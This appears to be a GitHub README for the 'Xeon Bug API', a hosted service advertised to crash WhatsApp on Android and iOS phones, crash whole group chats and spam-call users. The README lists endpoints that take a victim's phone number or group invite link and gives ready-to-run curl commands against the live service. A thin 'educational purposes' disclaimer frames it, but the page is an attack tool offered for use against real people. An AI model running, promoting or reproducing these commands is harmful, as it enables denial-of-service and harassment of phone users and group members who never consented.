Skip to content

Latest commit

Β 

History

History
110 lines (80 loc) Β· 3.14 KB

File metadata and controls

110 lines (80 loc) Β· 3.14 KB

πŸš€ Xeon Bug API

The Xeon Bug API is a powerful endpoint API developed by Dream Guy Xeon to exploit vulnerabilities in WhatsApp. This API provides endpoints that can:

  • πŸ›‘ Delay WhatsApp on Android devices.
  • πŸŒ‹ Spam Call Users on WhatsApp.
  • 🍎 Crash WhatsApp on iOS devices.
  • πŸ’₯ Crash entire WhatsApp group chats.

⚠️ Warning: This API is for educational purposes only. Misuse of this tool may result in serious legal consequences. Use responsibly.


🌟 Features

  • πŸ”₯ Delay Android Devices
  • πŸ•ΈοΈ Spam Call Users
  • 🍏 Crash iOS Devices
  • πŸ’¬ Crash Group Chats

πŸ“Œ Endpoints

1 Delay Android WhatsApp

Description: Delay and crashes WhatsApp on Android devices.
Endpoint:

GET ${api_link}/freezeDroid?target=${number}

Parameters:

Key Type Description
target String The WhatsApp number to be targeted

2 Spam Call Users

Description: Spam call users on WhatsApp.
Endpoint:

GET ${api_link}/callSpam?target=${number}

Parameters:

Key Type Description
target String The WhatsApp number to be targeted

3 Crash iOS WhatsApp

Description: Crashes WhatsApp on iOS devices.
Endpoint:

GET ${api_link}/iosCrash?target=${number}

Parameters:

Key Type Description
target String The WhatsApp number to be targeted

4 Crash Group Chats

Description: Crashes an entire WhatsApp group chat.
Endpoint:

GET ${api_link}/crashGroup?target=${grouplink}

Parameters:

Key Type Description
target String The WhatsApp group chat link to target.

Setup For Deployment πŸ‘‡

🎯 Generate Pair Code For Session

Xeon

⚠️ Disclaimer

Note:
This API is designed strictly for educational and research purposes to highlight vulnerabilities in applications. Any unauthorized use to harm individuals, groups, or organizations is strictly prohibited. Ensure you comply with all applicable laws before using this API.


πŸ’» Example Usage

# Delay Android WhatsApp
curl -X GET "https://xeon-bug-api.onrender.com/freezeDroid?target=1234567890"

# Spam Call User
curl -X GET "https://xeon-bug-api.onrender.com/callSpam?target=1234567890"

# Crash iOS WhatsApp
curl -X GET "https://xeon-bug-api.onrender.com/iosCrash?target=1234567890"

# Crash Group Chat
curl -X GET "https://xeon-bug-api.onrender.com/crashGroup?target=https://chat.whatsapp.com/exampleGroupLink"

πŸ‘¨β€πŸ’» Developed By: Dream Guy Xeon

Enjoy bugging responsibly! ✨